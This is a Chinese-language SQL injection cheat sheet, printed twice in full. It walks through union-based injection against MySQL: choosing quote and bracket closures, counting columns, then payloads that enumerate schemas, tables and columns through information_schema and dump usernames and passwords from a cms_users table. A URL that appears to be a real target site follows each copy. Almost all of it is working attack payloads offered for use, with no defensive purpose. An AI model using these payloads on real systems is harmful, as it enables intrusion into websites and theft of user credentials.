//第一步:判断注入点的前缀(用来闭合原 SQL 里的引号/括号)与后缀(注释掉原语句剩余部分)。所有 payload 都是手工拼进 URL 参数的,后缀 # 在 URL 中必须编码为 %23(见下),否则浏览器把 # 当作片段标识,后面的内容根本不会发到服务端
字符型(单引号闭合)        'order by 1#      验证注入点:'and 's' IN ('swords')#   (恒真条件,页面应与正常请求一致)
数字型(无需闭合)          order by 1#       //前缀为空,后缀为#
字符型(单引号+括号闭合)   ')order by 1#     验证注入点:')&& 's' IN ('swords')#
//较少见:双引号+括号闭合  ")order by 1#
//注意:这里的 # 写进 URL 时要编码为 %23(或改用 --+),否则不会发送到服务端
//确定字段数:'order by N# 从小到大递增 N,直到页面报错/异常,最后一个正常的 N 即为字段数;随后把 id 改成不存在的值(id=-1')让原查询无结果,再进行 union(U) 或报错(E)注入查询
//例如字段数为3时用 union select 1,2,3# 观察页面回显了哪个数字,该列即显示位(能输出数据的列);下面示例是5个字段、显示位在第4列,实际要按自己 order by 的结果调整
//查看基本信息:当前用户 | 当前库 | 版本,用于确认是否为 root 以及 MySQL 版本(information_schema 需要 5.0+)。char(32,58,32) 即 " : ",0x7c 即 "|";注释符已编码为 %23
id=-1'union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5%23
//爆出所有数据库名(information_schema.schemata 只列出当前用户有权限的库,root 才能看到全部);unhex(hex()) 用于避开字符集/编码导致的乱码或对字符串的过滤
id=-1'union select 1,2,3,unhex(hex(group_concat(schema_name))),5 from information_schema.schemata%23
//查询某个数据库下的所有表:table_schema 可直接用 database() 取当前库,也可用库名的 hex 编码避免引号被过滤;0x7068706161 是 phpaa 的 hex 编码。语句末尾要用注释符收尾
union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables where table_schema=0x7068706161#
//查询某个表下的所有字段:0x636D735F7573657273 是 cms_users 的 hex 编码。只按 table_name 过滤时,其他库里同名表的字段也会混进来,应同时限定 table_schema;注意这里示例是4个字段、显示位第3列,和上面5字段的示例不是同一个注入点
union select 1,2,unhex(hex(group_concat(column_name))),4 from information_schema.columns where
table_name=0x636D735F7573657273 and table_schema=0x7068706161#
//查询数据:按上面得到的 库名.表名 读取字段(库名 phpaa 与 0x7068706161 对应)。DISTINCT 后的 + 是 URL 编码的空格;group_concat 之后必须有逗号再接后续列;列数(这里共7列)要与 order by 得到的字段数一致。group_concat 默认最长 1024 字节(group_concat_max_len),结果被截断时改用 limit 分页读取
union select 1,2,group_concat(DISTINCT+user,0x3a,password),12,13,14,15 from phpaa.cms_users#
http://m.yicp.com/news/newslist.php?categoryId=15
字符型(单引号闭合)        'order by 1#      验证注入点:'and 's' IN ('swords')#   (恒真条件,页面应与正常请求一致)
数字型(无需闭合)          order by 1#       //前缀为空,后缀为#
字符型(单引号+括号闭合)   ')order by 1#     验证注入点:')&& 's' IN ('swords')#
//较少见:双引号+括号闭合  ")order by 1#
//注意:这里的 # 写进 URL 时要编码为 %23(或改用 --+),否则不会发送到服务端
//确定字段数:'order by N# 从小到大递增 N,直到页面报错/异常,最后一个正常的 N 即为字段数;随后把 id 改成不存在的值(id=-1')让原查询无结果,再进行 union(U) 或报错(E)注入查询
//例如字段数为3时用 union select 1,2,3# 观察页面回显了哪个数字,该列即显示位(能输出数据的列);下面示例是5个字段、显示位在第4列,实际要按自己 order by 的结果调整
//查看基本信息:当前用户 | 当前库 | 版本,用于确认是否为 root 以及 MySQL 版本(information_schema 需要 5.0+)。char(32,58,32) 即 " : ",0x7c 即 "|";注释符已编码为 %23
id=-1'union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5%23
//爆出所有数据库名(information_schema.schemata 只列出当前用户有权限的库,root 才能看到全部);unhex(hex()) 用于避开字符集/编码导致的乱码或对字符串的过滤
id=-1'union select 1,2,3,unhex(hex(group_concat(schema_name))),5 from information_schema.schemata%23
//查询某个数据库下的所有表:table_schema 可直接用 database() 取当前库,也可用库名的 hex 编码避免引号被过滤;0x7068706161 是 phpaa 的 hex 编码。语句末尾要用注释符收尾
union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables where table_schema=0x7068706161#
//查询某个表下的所有字段:0x636D735F7573657273 是 cms_users 的 hex 编码。只按 table_name 过滤时,其他库里同名表的字段也会混进来,应同时限定 table_schema;注意这里示例是4个字段、显示位第3列,和上面5字段的示例不是同一个注入点
union select 1,2,unhex(hex(group_concat(column_name))),4 from information_schema.columns where
table_name=0x636D735F7573657273 and table_schema=0x7068706161#
//查询数据:按上面得到的 库名.表名 读取字段(库名 phpaa 与 0x7068706161 对应)。DISTINCT 后的 + 是 URL 编码的空格;group_concat 之后必须有逗号再接后续列;列数(这里共7列)要与 order by 得到的字段数一致。group_concat 默认最长 1024 字节(group_concat_max_len),结果被截断时改用 limit 分页读取
union select 1,2,group_concat(DISTINCT+user,0x3a,password),12,13,14,15 from phpaa.cms_users#
http://m.yicp.com/news/newslist.php?categoryId=15